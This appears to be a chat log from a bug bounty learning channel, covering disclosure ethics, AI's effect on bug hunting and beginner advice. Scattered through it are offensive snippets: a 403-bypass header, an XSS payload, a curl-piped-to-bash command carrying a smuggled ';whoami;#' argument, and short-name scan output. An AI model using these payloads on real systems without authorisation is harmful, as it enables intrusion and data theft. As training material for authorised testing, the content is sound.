In reality it's more nuanced than that. If you don't want to actively hunt VDPs, that's fine (and I don't even remotely blame you if you value your time). That's not why VDPs exist anyway. They exist so that if you stumble across a flaw, you are safe to report it without fear of legal repercussions.
If, heaven forbid, you did accidentally find a way to leak user data from a company with a VDP but no bug bounty, then yes, as a security researcher I would expect you to report it with no expectation of a reward.
That's literally the difference between a white hat and a black hat.
And yes, orgs tend to have their own best interests at heart -- over those of their customers -- but that doesn't mean you get a free pass to stick it to them. Especially if it involves customer data.
How many real people do you think get hurt every time there's a data breach? Yes, it hurts the company in fines and reputation, but the users themselves also end up compromised, identities stolen, whatever (depending on what gets nicked obviously).
Then what happens if someone comes along tomorrow, finds the same issue, and uses it to dump that PII? You're morally responsible for that just as surely as if you did it yourself. If you knew something that could have stopped it and chose to do nothing then like it or not, that blame is also on you.
For the record, I do agree that a big org using a VDP instead of a bug bounty programme is a dick move, although I wouldn't call it "petty". I also don't think they automatically owe you money for voluntarily finding flaws for them -- although it's obviously courteous of them to offer it.
That said, stooping to their level and refusing to use your knowledge of an active vuln to help them makes you just as bad.
Again, neither a VDP or a BBP is the only line of defence... Or, if it is, they have serious problems lmao.
Don't overestimate the role BBPs play in a security architecture. In the grand scheme of things they mean very little to an org. Basically a nice little bonus rather than something to be directly relied on.
If one org has decided that they don't need a BBP, well, that's their decision 🤷♂️
I would always argue that if you're not using a BBP then publishing a VDP is a sensible option though, because it means that if an ethical researcher does find something then they feel safe to report it.
Then again, I would also argue that you should voluntarily reward said researcher for their expertise, regardless of whether you want people to be actively hunting on your platforms 🤷♂️
Yes, it's a sensible option imo -- in many cases at least. Just up to them whether they go that route. At the very least most countries require them to get pen tested frequently if they're handling sensitive data.
That said, think about it this way:
Let's say you were out walking and the path took you underneath a road or a rail bridge. If you saw that one of the struts was rusted almost completely through and looked to be close to collapse, would you report it, or just keep walking?
Would you expect to be paid for reporting it? What happens if you don't report it and a week later that bridge collapses letting a train fall down, killing hundreds of people? Would you feel responsible for that, even though you're not a bridge inspector employed by the state to go and find those issues?
Arguably the professionals (pentesters for our industry) should have spotted that issue. The bridge should have been shut (system not been allowed to go live) until it was confirmed to be safe. But for whatever reason that hasn't happened.
That's the role that BBP and VDP play. They're an unreliable way of finding the flaws that have either been missed, or have developed after testing occurred -- counting on the good will of the "public" to stop a catastrophe that slipped through the gaps of the official testing. BBP are just a way of incentivising people to actually go and look for issues, rather than just reporting them when they find them.
thanks
Gave +1 Rep to @spiral shuttle (current: #65 - 105)
what is rep

How likely are bug bounties to be replaced by AI? and in how many years? Is it worth starting in 2024?
Don't know about it being replaced by AI, but I will be starting my first bug bounty later this year
My bet is that absolutely a large chunk of the market will get replaced. It's the ideal application for LLMs. Systems that you interact with using text, no human intermediary, in addition a perfect environment for automated training at scale with auto-generated boxes, not limited by any human factors (like having audio transcript for training).
I expect much faster progress in this area than for example in customer service. AI will do at a minimum the low hanging fruits at a speed and price that humans aren't gonna compete with. Including detailed reports with instructions for remediation. I have no doubt by the end of the decade that's gonna be standard.
There's gonna be room for top experts for many years to come, but that's not gonna help most.
Hmm sounds like we're all doomed?
...
Only if you have that outlook.
People already use automation tools for searching for bounties, AI would just be an upgrade.
I might be wrong. I wouldn't bet a penny against my prediction, I'm pretty sure it's gonna happen. Time will tell. Pretty soon.
But there's many other jobs in IT security.
But there's always gonna be zero days which will never be found using automation right
Yes and No.
This argument is equivalent to "people already use horse drawn carts, the automobile would just be an upgrade".
It's meaningless unless we define how much of an improvement the "upgrade" is.
And also since most people develop their own automation tools there's probably never gonna be one perfect tool that does it all
The automobile was an upgrade though.
One that changed the world and made horse drawn carts obsolete within a lifetime, yes.
Thank you for agreeing it was an upgrade, have some free rep.
Gave +1 Rep to @spiral shuttle (current: #54 - 130)
Literally everything I decide to do there's people telling me It's either too hard, too late, or that It's gonna be replaced by AI
I am completely lost.
Do what you want to do.
Don't base it on what somebody else thinks you should do.
As I said, "just an upgrade" is a meaningless statement unless you define "upgrade" and the consequences that come with it.
Who knows, maybe the lack of bugs found will bore you and put you off searching.
I will but i have to find out what makes the most sense
Maybe it will drive you, who knows?
Im pretty sure help desk is way more competitive than bug bounties
Reality is you can't know, any decision you take is gonna be a gamble and you're gonna have to completely reorient yourself in your life anyways. If it's not AI bug hunting then something else.
Okay, I'll just finish my A+, and do bug bounties in my free time
That's the best way to tackle them IMO
I don't care what anybody says,
Bug bounty is not a sustainable income.
let's destroy all the AI platforms like chatGPT then 😹 🙏
Destroy?
Also if I find a few bounties I could brag about it at work, and ask for a Pentest+ voucher
Or have enough money from the bounties you can purchase it yourself.
Win/Win.
Unless you fail.... 
but who doesnt love free stuff right
yeah with nuclear bomb or idk
I'm pretty sure a nuclear detonation would be a bit overkill...
All AI will eventually be vulnerable and will need humans to protect it
gg to AI then :(
yeah probably
technology is too complex to be 100% un-hackable in my opinion
so while AI will replace a lot of jobs, hackers will hack the AI, and more security jobs will appear
i hope so
That math doesn't work out. There's not more factory jobs today because industrial robots need people to program and maintain them. There's less. Much less.
i dont want to be useless when i got all my certifications
industrial robots today have nothing in common with the extremely complex AI robots in the future
10 years from now
so the math does work out
more robots = more security needed
Basic economics dictates that if using AI requires more staff to develop, maintain and secure it than the staff it makes obsolete, AI is not going to be used.
If your assumption is correct you solved the problem you're afraid of.
Depends if it manages a higher profit.
Also the power usage is insanely high
But probably AI will take jobs. Get some others in return. In the end high unemployment is also bad for companies that profit from AI because it hurts the economy overall. Will end up balancing itself out.
The amount of jobs AI will replace will be huge that's true
But it 100% will create security jobs
Making Tech even a better field in the future than it already is
The question is, which jobs in Tech are in danger
Flip a coin I guess
Web development will surely be one of the first to be replaced
Can someone with knowledge about ssrf send me a private message? I think I found a vulnerability, but I'm not sure, I have a question☝️
bro tryhackme is legit tweaking
man i thought premium users had it good, was 12 bucks worth it for an issue like this (the issue is that nothing will run, but they work on other machines)
If I wanna do bounty hunting can I skip Windows/Linux CTFs?
And just focus on web app CTFs?
Or is that a bad idea
No that’s a good idea, you won’t ever really need to do boot2root if you’re just doing web bounties
I'm not sure what this is for, but we won't help you with the bounties.
You're asking us to do work that you're getting paid for
lord forgive being generous
its a question, not really the whole thing
just asking around if anyone knew
Can you provide the scope for the Bug Bounty?
Are you trying to get a bounty on a random website?
Hi
Then you'll need to share the scope set by hackerone.
Just bear in mind that any help you receive, somebody may just submit the report for the bounty
a way to bypass 403 might be by using the HTTP header X-Forwarded-For: 127.0.0.1
thanks man
Gave +1 Rep to @brisk shuttle (current: #1400 - 2)
could you check your dms?
okay
what about split bounty with you ?
Where's the guarantee though? Only one person can submit and you're trusting the other person, that you don't know, will a) give you the money at all and b) will give the appropriate percentage. Things get even more convoluted if you're not in the same country as well as a bunch of other factors.
its easy in hackerone report I invite you then split the bounty read this: https://docs.hackerone.com/en/articles/8457618-collaboration
Hackers: Collaborate with other hackers
That must be newer, I don't remember it being there a while ago. It still seems like there is room for dispute though as each party is rating contributions? Still something I would be wary of.
I'd be open to collaborating on a bug bounty
at one point I had a very large map of Tesla's network
Just google 403 bypass there's a bunch of ways and/or tools you can use
like which?
where to learn how to bypass WAFs?
please, if you actually want to help me, do not just tell me to google it, i've already tried that
you don't "learn" how to bypass WAFs unfortunately
there's no course out there for it
you just bash your head in until a payload works
anyone could recommend some good reverse engineering resources like free Books, online courses, or tutorials. Thanks in advance!
Please don't spam the same thing in multiple channels.
on hackerone if i wanna join a bug bounty program
do i just start immediately or is there some sort of legal forms and consent i have to do
I think there are programs that you can join immediately. However, you have to be mindful of the scope of each program so as not to have your tests be tagged or flagged as a potential attack.
Yea there's a few newer videos out there on how to bypass the majority of WAFs, I'll have to find the video and I'll post it... Pretty easy actually
If you want to dm I can help you try to escalate...
Here's that video ... https://m.youtube.com/watch?v=VKnX1vj65Ro
LIKE and SUBSCRIBE with NOTIFICATIONS ON if you enjoyed the video! 👍
The presentation will provide various methods on how you can bypass modern web application firewalls (WAF). During the presentation, we will cover hands-on labs that simulate various WAF scenarios. The labs will be open source and you will learn how to effectively customize yo...
They also have a "playground" where you can practice the techniques shown...
thanks man
Hi, I have just configured the header for my requests, but I still can't see my custom header in my request headers
I used Custom Header Extension
Not familiar with the tool but Burp definitely has an option for that
Match and Replace rules under Proxy Settings
Click add and it has a placeholder that teaches about adding a new header
thx 
Gave +1 Rep to @lilac spindle (current: #22 - 380)
hello everyone! When I want to make a transaction with the in-scope url given in a bug bounty target, are subdomains and directory urls included? So, is it necessary or prohibited to scan subdomains and directories via the in-scope url (main domain)? Are the subdomains and directories I found considered out of scope?
A scope that states: "*.target.something" includes subdomains and directory urls. If the scope is just "target.something" then it only includes directories like target.com/directory etc.
Hi guys im learning different web vulnerabilities, can someone tell me which method is best to learn
- Learn a web vuln and become perfect (100%) at it (doing extra labs, ctf etc).
Or - Learn a web vuln till intermediate lvl then go to the next vuln, and when done with all vulns then go for advanced lvl
thank you!
Depends on for which purpose, if you're looking into bug bounties I think the first option is an okay approach, if you're looking to leverage the knowledge to get a job then definitely the second one.
If I managed to insert JavaScript to execute XSS, but when I open the source code it appears and does not execute, is there a way to make the payload execute?
I don't know how to explain, the first time the website saw that I wanted to insert <> " it blocked it, but once I managed to insert it, it doesn't execute, it appears in the source code but nothing happens
And I don't know if it is worth it or not to continue
Could something be filtering your payload from firing? Were you able to break out of the element? Is it being reflected anywhere on the screen or just in the source? If u want you can dm me and I can help try to pop the xss...
This is how it looks
In the first instance the website didn't allow using <>" but it works by modifying the request with Burp
First thing that pops into my head is trying to see if you can create a scriptable context within the html tag you are in
for example: <a href="javascript:prompt(document.domain)">
I'd also use portswigger labs as a reference they've got some pretty good stuff on xss
I'd look at the console to see why it's not firing.
quick question
if you have something like value="" then when you insert a script wouldn't the double quote cause a syntax error?
Burp Suite Deep Dive course: https://bit.ly/burpforpros
Why only a handful of security researchers and bounty hunters make it and how can you be one of them?
Free coding platforms:
https://freecodecamp.org
https://edabit.com
https://codewars.com
...
+1
Hey,
I am doing a bbp and I am pretty desperate as I was working on this one endpoint for too long to drop it, so I am writing here. So I had found an interesting functionality on a bbp and idk how to exploit it and if it is even possible. So in the website there is an error for incorrect login like Error: invalid username or password. And I found a way to change that error to whatever (it is in a parameter in the website like website.com/login?error=Invalidusername) so I can change it to whatever, and I began trying to get xss on the website, but they encode every input I make (for example < " ' all that) and I would have moved on, but what is interesting is that I am in a div element, not in some input or whatever, so like <div> I am here </div> and I don't wanna move on because I think that there should be a way to do something.
If anyone has any ideas I would be very interested to hear them.
Thank you very much
maybe use xsstrike?
I will try thanks for help
If it's being encoded there's nothing you can do, it's being handled as text
Oh that's unfortunate... Thanks for help
Gave +1 Rep to @fast fable (current: #14 - 540)
You referring to RegreSSHion? Have you checked that your target is vulnerable (e.g., 32-bit, etc.)?
yep
it is
but i still cant use the POC
Haven't looked at it myself so let's wait for others to chime in.
aight
Maybe post what error youre getting?
it just goes through
and gives me the terminal prompt again (but not a reverse shell)
My theory is the exploit failed but it doesn’t really check if it did fail that’s why you get that scenario.
nah cuz it took like 2 minutes
isn't it supposed to take hours?
cuz i thought that memory corruption takes centuries
yes, it most likely failed
I have a pretty massive question about bug bounties specifically so i figured this was the best place to put it
I am trying to find the specific IP address for a domain. When I run the host command I get:
example.com is an alias for example.cloudnet.com followed by four IPv4 addresses and a litany of IPv6 addresses
I receive the same output for:
nslookup www.example.com
However when I run a reverse dns lookup on Viewdns (still looking up www.example.com) I receive two IPv4 addresses associated with what appear to be Amazon-associated domains that do not match any of the previously found IPv4 addresses
Ultimately my question is what can I do with this information, why is it contradicting, and how can I find a singular IP address. I figured even if they were load balancing the requests it would still be associated to a singular address. I don't want to accidentally footprint something out of scope.
Looks like they're running on Elastic Load Balancing. Hard to get a single IP from that as ELB often doesn't have static IPs iirc. That's why the differentiating factor is the domain name for the ELB.
I am a noob just getting started, how can I get my hand into bbp?
Well to start, I would suggest learning about 1 or 2 web vulnerabilities like xss, SQL injection, idors, etc and how to find them... You can use some of the newer thm rooms or PortSwigger's labs for learning how to hunt for those specific bugs, after u feel like u know what you're looking for, then test out your luck on a target. If you are just learning I would suggest starting with a vdp instead of a bbp, as a bbp will have a lot more competition and a higher chance of dupes, especially on any low hanging fruit...
Hi everyone!
Can you advise good bounty platforms for beginners? Preferably with some kind of on-boarding. If it was already discussed here, please link the post.
Also, are there any good vulnerabilities to start learning bug hunting with?
that's great advice
does vdp stand for Vulnerability Discovery Program?
Yes, there's a lot less competition on VDPs so there's the chance that some of the easy bugs like idors, xss, authentication misconfigurations, etc still exist on those. Now these may still exist on BBPs but chances are they have already been reported. As far as platforms I would suggest HackerOne, Bugcrowd or Intigriti. Targets I would suggest a company you are already pretty familiar with.
Thank you!
Gave +1 Rep to @lilac bough (current: #77 - 85)
I would also suggest checking out some of nahamsec's newer videos and engaging with his discord server, he just recently had a 5 week program going on where he chose 3 targets for the month, did a bunch of the initial recon for you and covered which bug to hunt for the week, there's live bug hunting sessions going on all the time... then once the 5 week program was over 1 person out of the group was chosen to work for nahamsec as a web pentester... But here's the thing, the 5 week program went well and was extended so now there's monthly targets, he partnered with trickest and they scanned every bug bounty program and created a big database of recon on every "target" free to use..
Is it worth buying his course on bug bounty?
Hello guys.
If this is the wrong channel i'm sorry.
I am testing for RCE because I have found a bash script on a page. When accessing it, it will be downloaded with the following content:
```sh
#!/bin/sh
# First positional argument: the domain used for the new host directory (used unquoted, as found)
DOMAIN=$1;
APPLICATION="MyApp";
# Copy the customer template into a per-domain host directory
cp -r /directory1/$APPLICATION/usr/hosts/customertemplate /directory1/$APPLICATION/usr/hosts/$DOMAIN;
# Make the new host directory group-writable
chmod -R g+w /directory1/$APPLICATION/usr/hosts/$DOMAIN;
```
With curl I can send the parameter. My question now is: how can I manipulate the parameter to get RCE (e.g. whoami)?
Thank you for your help ❤️
What are you doing?
I found a bash script on a webpage. When I run curl I get the following message:
```
curl -sSL https://URL-TO-BASH-SCRIPT.sh | bash -s -- ";whoami;#"
cp: cannot stat '/directory1/MyApp/usr/hosts/customertemplate': No such file or directory
chmod: cannot access '/directory1/MyApp/usr/hosts/;whoami;#': No such file or directory
```
How can I run a correct parameter? I mean it's like a SQL injection but it's on a bash script (no input sanitization).
Ok, which website?
Do you have permission to be doing this?
It's my company's website and yes, I'm permitted to do penetration tests. I don't want to tell the correct URL because of the possible security issue.
Then please ask for help inside your org, we won't know the setup of your website etc, so we're not really in the best place to assist.
Does it help you to know that the webserver is running Ubuntu as its setup? I just want to know how to pass the whoami parameter to prove RCE on that file.
Not at all, there are many different versions of Ubuntu.
In any case it doesn't look like RCE, more like you are running the script locally on your PC. Also, curling and piping it into bash is very common for installing.
Oops, sorry, my bad 🙈 but thank you anyway
Guys I have a question
I'm a beginner at bug bounty
Does anyone have sources or courses on it

@grand knot you can try sources like NahamSec or Jason Haddix on YouTube, but the best way I believe you can get into bug bounties is by jumping right in and practicing with black box rooms like the ones from PortSwigger or VulnHub. TryHackMe also has a bunch of amazing modules to learn from as well.
All of these resources are pinned if you want quick links^
Guys, does anyone have an idea if these exploits count as a VM escape? CVE-2024-21111 / CVE-2024-21112. NIST says "allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox". So only local priv escalation but not VM escape?
Hello, how can I update multiple product reviews using a NoSQL manipulation technique on MongoDB?
Hey I am a full-time bounty hunter. I'd like to collab.
I found an sqli, we can escalate it. 😉
If you've found it, why do you need help to escalate it?
just to collab bro but I'm almost done exploiting it
Their WAF was in place.
and maybe motivating some ppl to start their bug bounty journey
If you'd like help, you'd need to share the scope.
If he shared scope here wouldn't that dox the company since he's already mentioned the bug... Sqli should be a high to crit finding anyways, but you could always look into SQLi => RCE for some additional impact..
true
It's already P1 so I'm sure I'll get the max payment.
nice find
You might also be able to pop a shell from it
hello anyone up?
On the other hand, if they don't share the scope how can you ensure they're doing something legal and ethical?
Also, I wasn't speaking as a member willing to help, I was speaking as a moderator ensuring nobody is going to help anybody not be ethical and legal.
Your point is valid and I get it. Just trying to show another perspective, since he already mentioned the bug he's found, revealing the scope here would actually be considered unethical... Even in a private dm that could still be considered breaking the rules set by the bug bounty program, unless you were actually collaborating together....
I'd also be careful with that one depending on the table that was dumped, because now you could possibly have access to confidential information.... And depending on the scope, would be considered out of scope.... For example, here's a snippet from the NBA bbp:
```
- Do not access NBA customer, employee, or confidential information.
- Do not intentionally view or access any data beyond what is needed to prove the vulnerability.
```
Those who work a 9-5, what does your schedule for learning/live testing look like? Currently I'm thinking of spending an hour or two a day after work learning and doing labs, and then trying live targets on weekends to build on what I've learnt during the week.
This is pretty much what my schedule looks like, the key is to just be very deliberate with your testing when you do have the time and automating some of the repetitive tasks so you can focus on actually finding bugs. Also, keep your expectations at a realistic level, you won't make as much money as full time hunters and that's ok. But it's been a nice side hustle for some extra play money here and there.
Thanks for the insight mate. Currently I've just been doing VDPs because of the knowledge gap and time gap until I'm comfortable in a program. So no expectations about payouts yet hahaha. I just enjoy having permission to go ham on something and learn and poke at every little part of it, so the fun aspect is enough for me right now
Gave +1 Rep to @charred lichen (current: #1440 - 2)
what level of severity is reading /etc/passwd on a bounty site?
That mindset already puts you 10 steps ahead
You have to love the struggle lmao.
would it be considered sensitive data exposure ?
Let's gooooo. I do love it, just not enough hours in the sat hahaha. Or I ruin my sleep schedule
High/Crit
thank you
Gave +1 Rep to @charred lichen (current: #1090 - 3)
The biggest blessing is definitely just loving to learn and not being just satisfied that something works but needing to know the how and why. It's gotten me promotions at work and gotten me pretty far in a lot of other things
Not sure how useful this is since I haven't found my first real bug but something I read was put yourself in the shoes of the team that will be receiving the report and think of the impact something like that has for them. Like could it expose other things? Is it sensitive info. Could it be further exploited
Maybe that could give you an idea on how to make the report even better to get a definitive crit
I was just wondering since it doesn't have sensitive info like shadow does, it just has usernames.
Can you find anything more from there though? Like is it path traversal?
It was an SSTI.
Twig.
Popping a shell doesn't work, I can just read files.
I tried but it wasn't possible since there was a WAF... but maybe I haven't tried enough.
and I found another sqli just now
I'd like to collab w someone who's good at scripting and owasp top 10
we can hunt on all programs ig
I am new to bug hunting, can anyone help me out with recon?
I can help u
kindly dm
Here is something you could try for the waf https://m.youtube.com/watch?v=VKnX1vj65Ro
LIKE and SUBSCRIBE with NOTIFICATIONS ON if you enjoyed the video! 👍
The presentation will provide various methods on how you can bypass modern web application firewalls (WAF). During the presentation, we will cover hands-on labs that simulate various WAF scenarios. The labs will be open source and you will learn how to effectively customize yo...
Is there anyone willing to collab and build a little mini temporary team for bug bounties for a while? Because I'm struggling heavily, I'm looking to work with some people to help clear up how I might be approaching things and fix or improve my methodology for bug hunting.
Please, who knows anything about LFI attacks?
What’s your specific question?
I'm trying to perform LFI on an API endpoint that looks like this "/api/v1/user/change-avatar/", this allows me to upload an image for the avatar... but whenever I try doing an LFI command in Burp Suite, it just resets it to the file that I put initially.
I can help
Are you saying that when you send the request with the LFI command, the response shows the file that was put initially?
yhhhh
Probably truncation in the backend then
@codex you should try mapping out the upload process by using valid files and changing it slightly each time to get a good idea of why it works. This might work, and if it doesn't it should help in getting a better understanding of it so that you could possibly come up with your own bypass.
@gritty bough just a suggestion though
why do characters like < turn into <?
ah i see
i am guessing there's no way to bypass it too right?
same but eventually we'll find out
what was that
oh a spammer
No worries, thank you for notifying. Looks like they have been dealt with.
Gave +1 Rep to @glass wraith (current: #185 - 36)
what do I need to learn to be a bug bounty hunter?
like what libraries in JS?
and what programming languages?
Burp Suite, OWASP top 10, maybe some PortSwigger labs.... It wouldn't hurt to know some JS and maybe some Python, but if you get good at spotting anomalies then all you really need is Burp or any other proxy tool.
I'm starting portswigger academy and what libraries should I learn in Python and JS?
This is all going to depend on the app and/or what you are trying to do... I mean it's not a necessity... I've found bugs without knowing either... I've just recently got into js to get a better understanding of how I can manipulate xss in certain frameworks... I think just being able to read js is enough to get started though...
So I'm starting to do bug bounties. If I nmap and dirb websites I get blocked after a few seconds of scanning... how do I work around that?
ahh ok
Yea, they do say refrain from using automated tools...
They say that requests should be limited.
But how would you go about enumerating things if not automated?
Manually
But like, I want to enumerate a website, how would I manually do that?
Check out the dirb wordlist and go through one after the other?
How would you do a manual nmap scan?
Sitemap, robots.txt, looking at the source code, guessing, seeing the network requests etc
I wouldn't do an nmap scan, most times infra isn't part of the scope
If it was, I'm not sure - I guess the level of "automation" would differ between each program, you could ask for clarification
Yea, like if a server had a service on port 4444 I would not find it unless I nmapped it, no?
Wouldn't that be the same in the end?
Yea, idk, that's why I'm confused when they say
"refrain from using automated tools
limit yourself about requests per second"
So I guess nmap would be fine if I can make it slow.
Yeah, that's what I mean by the "level of automation"..it's kinda up to debate what counts as automation, hence why I'd probably ask to clarify
Bro do more passive recon.... You could also grab endpoints from the js ... Also good idea to use a VPN if you go the scanning route so you don't get your IP blocked... You could get IP address using dig or similar... Check shodan on ip for open ports or something similar ... You could utilize online scanner for subdomains if it's wildcard scope... That way it's not all active recon and you get blocked before you even start hunting
I believe they are referring to automated scanners like sqlmap, dalfox, etc. that send a bunch of blind payloads... I'd also try looking into some of the subdomains, maybe you find something that looks older and hasn't been tested yet... A lot of the low hanging fruit might've already been found on the main app.
Usually in a bug bounty scope and ROE, it's specifically stated how automated tools should be configured. They would say to lower the amount of requests (e.g. 1 req/sec) so you need to limit your tooling to that. For example: gobuster uses the -t option to control the threads so you can limit your request tooling there. There is also sometimes explicit mention of adding a header (e.g. X-HackerOne: username) so that your requests are identified and you're not some random bot they will ban outright.
Makes sense, especially since I'm a noob.
Hey, I'm doing bug bounty on an IIS website. I looked a bit for vulns and found the short name vuln. I used the Burp Suite extension and the target was vulnerable. The extension found 6 files. But I don't know in what format I should write the file. Here is the extension output (replaced the name of the target by redacted.com):
```
[*] Trying method "OPTIONS" with magic final part "/~1/.rem"
[*] Trying method "POST" with magic final part "/~1/.rem"
[*] Trying method "DEBUG" with magic final part "/~1/.rem"
[+] Host "https://redacted.com/" is vulnerable!
[+] Used HTTP method: DEBUG
[+] Suffix (magic part): /~1/.rem
[*] Starting filename and directory bruteforce on "https://redacted.com/"
[i] File: SVNCSH~1.RUL
[i] File: REDACTED~1.RAR
[i] File: WEB~1.CON
[i] File: APPLIC~1.CON
[i] File: PACKAG~1.CON
[i] File: GLOBAL~1.ASA
[+] Bruteforce completed in 8 seconds
[+] Total time elapsed: 9 seconds
[+] Requests sent: 870
[-] No directories found
[+] Identified files: 6
|_ SVNCSH~1.RUL
|_ REDACTED~1.RAR
|_ WEB~1.CON
|_ Actual file name = WEB
|_ APPLIC~1.CON
|_ PACKAG~1.CON
|_ GLOBAL~1.ASA
```
I need to show impact, can someone help me?
Hey all, I am new to bug bounty, I was wondering if I could get some tips on how to get started. Really appreciate the help
There are a few web hacking modules on THM. You could search them. They will teach things like XSS and SQL injection. OWASP Top 10 (2021) would also be a good room to learn about the type of vulnerabilities you can look for when doing bug bounties.
Thank you
Gave +1 Rep to @near spear (current: #41 - 183)
There's some useful posts in the pins. I'd recommend portswigger academy as well
Ack
did you use postman to confirm this was the right endpoint and it was indeed accessible?
Can you recommend a good VPN?
proton has a free tier you could use
okay, that's what I use.
hi
Hello what is your q?
Have you demonstrated impact in your exploitability?
That is the one big thing companies that run BBP want
No, not the impact, I just reported that I could get the sensitive information of their website, that's it.
Their report should state why it was accepted as P5. If not, you can further clarify it.
@rustic pebble
I am gonna get into VDP because I was searching for an XSS bug in Evernote, which is a BB on HackerOne, but I can't. So, I just changed to VDP and then need to go BB.
nothin wrong with that
public bbps are pretty competitive
too many eyes all on the same thing
aside from the whole "good for gaining experience" thing with vdps, if they're done on a platform like h1, they can help be a gateway into more private programs that are less competitive and/or fresher targets
cool
If you know any of the websites to do VDP, kindly share.
also if you're just wanting to mess around and don't care about getting paid, open source is a great target for simple disclosure, esp those that run a vdp through github advisories
not nearly as many people looking there so often easier to find things, depending on the type of software
honestly i've been too busy lately to even do any bounty work, so I can't name any specific programs
just the big platforms like h1 and bc where a lot of companies post
And then my main aim is to make my resume look good because I can't pay for expensive certifications. So, I just jumped to VDP and add it to my resume instead of n number of certificates.
thanks bruh
Gave +1 Rep to @rustic pebble (current: #58 - 127)
Exactly why I started on VDPs. The general consensus is oh you don't get paid! I mean if you're starting out you're more than likely not going to find the bugs that will get you paid anyway unless you get lucky
@ripe mountain if you wanna look for something not on a public platform like HackerOne/Bugcrowd you can also try a google dork like
intext:"vulnerability disclosure program" inurl:".com"
For the inurl part I put .com.au because I'm based in Australia and want to work on Australian VDPs but that's just personal preference
Thanks bruh
🍻
Hi
Hi
Anyone know if Splunk's vuln disclosure through HackerOne pays bounties? Didn't get an invite to their private program yet, but can still submit through the embedded submission linked from the Splunk page.
Can anyone explain the IDOR vulnerability to me and how to report it?
What’s your specific issue with it?
Is it a kind of IDOR?
I don’t get what you mean sorry
If it's a KOTH inquiry specifically, #koth should be a better one.
No, it's not specific.
I mean if you start something privately,
then if anyone sees that private thing,
then what should we call it?
Let's take an example: if you start a game with your friend privately and everyone can see it, then why is it private?
Can you actually join the game or is simply seeing the results? Is there any sensitive information you can see or retrieve or something you can leverage to gain further access? As it is, it is just the results which I don't think requires the level of protection you are looking for in this case.
I assume the "private" part is that it cannot be participated in by non-invitees, rather than meaning its presence is hidden
Or did you verify that such private matches are not accessible via the usual spectate interface, and you explicitly only accessed them by exploiting IDOR
okay
But what if someone else, I mean another person who is not in the game, hacks the machine and makes whoever he wants the winner?
Is it still not considered a bug?
For me it's just visible points and other things, but maybe there is someone who exploits the vulnerability and has access to the machine IP too, and by that he can hack any machine and then he is a kingmaker.
I don't know who this is. But there is someone who can see the IP too. I don't know how, but it's true.
And I have faced this issue several times.
Someone made me king again and again even though I'm not pwning any machine because my OpenVPN doesn't work properly.
If you are still ignoring it, then okay. I don't care too.
But there is a vulnerability in KOTH.
@stray kiln if you think there is a vulnerability, you can definitely submit a report. Check the docs I linked for help on the topic.
I know there is a vulnerability but I don't know the name of it, and also I just have screenshots of it, nothing else, and also I don't know how to report it. Can you help me with this?
The intent here is not to ignore, but rather to understand the basis of the concern. As @lilac spindle pointed out, THM has a BBP where you can report it, but you'll need to provide more information on what was achieved, how it can be re-created, etc. for it to be actionable on THM's part (and for it to be prioritised accordingly once confirmed).
I know what you wanna say. But I just want to know, in this scenario, which vulnerability do I have to report?
How did you discover the issue?
What step-by-step process did you do to encounter it?
I didn't encounter any step.
When I was playing with my friend at my home,
we both tried to hack the machine,
but our OpenVPN doesn't work properly. So we both can't hack the machine. But suddenly someone put my friend's name in the king.txt file and he is showing as king in that game and he won.
And there were only two persons in the game, me and my friend.
So how can someone get the IP of that machine and hack it too and put my friend's name in the king.txt file? That's my question.
And yesterday also someone put my name in the king.txt file. I don't know if my opponent is trolling me or someone else is helping me, but it happened in 3 continuous games. That's shocking for me, that's why I'm here.
IIRC.
It will automatically declare a winner if the game is not interacted with.
Not like that, someone put the name of my friend in the machine, I confirmed it now.
Someone hacked the machine and put his name.
for a bug bounty / vulnerability report you would really need solid evidence of this at least
Ideally for a bug bounty you would provide a detailed report on step-by-step process to achieve whatever the given exploit is and show its results, so that the company can reproduce the exploit to verify that it exists and then fix it
to report a vulnerability, you would have to be able to demonstrate that it exists with evidence other than anecdotal report of something that seemed a bit weird
It does sound like the game just declared a winner because neither party interacted with it. You'd need evidence of another 3rd party joining the private game somewhere.
Okay, now I will try to find evidence next time.
Hello friends I’m new to bug bounty hunting which learning paths should I study?
I know the basics I want to grow my skills in bugs and ways to find them
Since XSStrike is abandonware, is it still good for finding XSS bugs?
Bro, I would recommend you try it manually with Burp Suite if you wish (no Intruder, my preference is to do it manually), and try payloads in different positions. For example, if the webapp you are auditing has a way to publish posts, then you should try some XSS payloads on a post; if the webapp has login or register, try on them too; check if the URL has parameters like search?= p=, etc. Get payloads from HackTricks or GitHub, and you can assemble your own payloads too.
https://github.com/BlackFan/content-type-research/blob/master/XSS.md
https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
I know how XSS works lol
I just want to blast through payloads to see if even ONE sticks
XSStrike isn't a bad option but it will probably miss some parameters. In the context of bug bounty, if you want to find a bug you have a higher chance of getting it manually without automation, but if the noise isn't a problem you can try both, XSStrike and manually.
Good afternoon everyone
I just obtained sec+ and I am looking to expand on my pentesting skills value to ultimately fill a pentester role, is the THM bug bounty program a good place to start?
Try Nahamsec yt channel, github and discord for bug bounty, they are a good community
Thank you!
Gave +1 Rep to @jagged siren (current: #2213 - 1)
You're welcome!
If someone has found a bug before, what are the steps or the things he/she does to enumerate the website and search for vulns? I know it is not a standard thing, but I mean your ideas about it, or if u use a plan or something like this. Again, I know it is not a standard thing, but I am a beginner and I don't know where to start.
Are you looking for enumeration tips?
exactly
I've reported this a while back, so THM staff is aware of this, along with the steps to replicate... Wasn't deemed a security issue tho, so it's probably low on their list to fix. If you remember the game id # I'm sure they can monitor who all connected etc... depending on how far back, I'm assuming... Not actually an IDOR that is causing this issue...
If you are able to connect to the machine while it's happening you could always use a command like ss to see all IPs connected to said machine... Just be sure it is an outsider before reporting to staff....
It's a long time ago for me because I play up to 20 matches every day and remembering the game id of that game is not easy for me.
Yeah I know, but it mostly happens when I can't pwn the machine,
like h1 hard fireworks hackers etc machines
One time it happened to me in Panda too, but that time it told me read-only file system and at that time I didn't know about that command.
If you suspect it's happening during a match you are playing and are able to get access to the machine, take a screenshot of the output from ss that will help build your case on whoever is intruding on your private matches
It happened on a public game, but in that game we both are friends and at the same place and we both don't hack the machine, but the king changes.
If it's a public game with multiple players it could be someone just trolling... Read only sounds like that directory was mounted over ... If it's a private match and you could get proof that a player outside of your private game is in the machine then I'd say it would be ok to report.
Also if there is a tie, the game will choose the last player to join the game as the winner... Some games the king changes will start off at 1, instead of 0... This is because there is the placeholder king inside of the file....
